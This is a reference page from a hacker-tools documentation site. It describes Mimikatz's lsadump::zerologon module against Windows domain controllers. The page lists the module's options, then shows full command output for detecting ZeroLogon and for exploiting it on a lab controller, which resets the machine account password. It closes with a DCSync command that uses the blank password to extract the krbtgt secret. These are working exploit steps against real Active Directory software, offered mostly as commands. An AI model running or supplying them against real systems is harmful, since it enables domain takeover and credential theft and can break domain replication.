The Hacker Tools
GitHubTwitterThe Hacker Recipes
Search…
Introduction
Mimikatz 🥝
General 🛠️
Modules
crypto
dpapi
event
kerberos
lsadump
backupkeys
cache
changentlm
dcshadow
dcsync
mbc
netsync
lsa
packages
postzerologon
rpdata
sam
secrets
setntlm
trust
zerologon
misc
net
privilege
process
rpc
sekurlsa
service
sid
standard
token
ts
vault
🛠️ Impacket
🛠️ CrackMapExec 🔱
🛠️ Exegol
Powered By GitBook
zerologon
lsadump::zerologon detects and exploits the ZeroLogon vulnerability. It has the following command line arguments:
  • /account: the target DC SamAccountName
  • /target: the target DC FQDN
  • /exploit: proceed with exploitation
  • /null: null session authentication
  • /ntlm: use NTLM authentication
  • /type: The Secure Channel Types. The available values are:
    • Null
    • MsvAp
    • Workstation
    • TrustedDnsDomain
    • TrustedDomainUasServer
    • Server
    • CdcServer
This technique can break the domain's replication services hence leading to massive disruption, running the following "password change" technique is not advised.

Detection

1
mimikatz # lsadump::zerologon /target:dc.hacklab.local /account:dc$
2
[rpc] Remote : dc.hacklab.local
3
[rpc] ProtSeq : ncacn_ip_tcp
4
[rpc] AuthnSvc : NONE (0)
5
[rpc] NULL Sess: no
6
7
Target : dc.hacklab.local
8
Account: dc$
9
Type : 6 (Server)
10
Mode : detect
11
12
Trying to 'authenticate'...
13
=============================================================================================================================================================================================================================================
14
15
NetrServerAuthenticate2: 0x00000000
16
17
* Authentication: OK -- vulnerable
Copied!

Exploitation

1
mimikatz # lsadump::zerologon /target:dc.hacklab.local /account:dc$ /exploit
2
[rpc] Remote : dc.hacklab.local
3
[rpc] ProtSeq : ncacn_ip_tcp
4
[rpc] AuthnSvc : NONE (0)
5
[rpc] NULL Sess: no
6
7
Target : dc.hacklab.local
8
Account: dc$
9
Type : 6 (Server)
10
Mode : exploit
11
12
Trying to 'authenticate'...
13
=============================================================================================================================================================================================================================================
14
15
NetrServerAuthenticate2: 0x00000000
16
NetrServerPasswordSet2: 0x00000000
17
18
* Authentication: OK -- vulnerable
19
* Set password : OK -- may be unstable
Copied!
A DCSync can then be conducted with lsadump::dcsync.
1
mimikatz # lsadump::dcsync /domain:HACKLAB.LOCAL /dc:dc.hacklab.local /user:krbtgt /authuser:dc$ /authdomain:HACKLAB /authpassword:"" /authntlm
Copied!
Previous
trust
Next
misc
Last modified 6mo ago
Copy link
Contents
Detection
Exploitation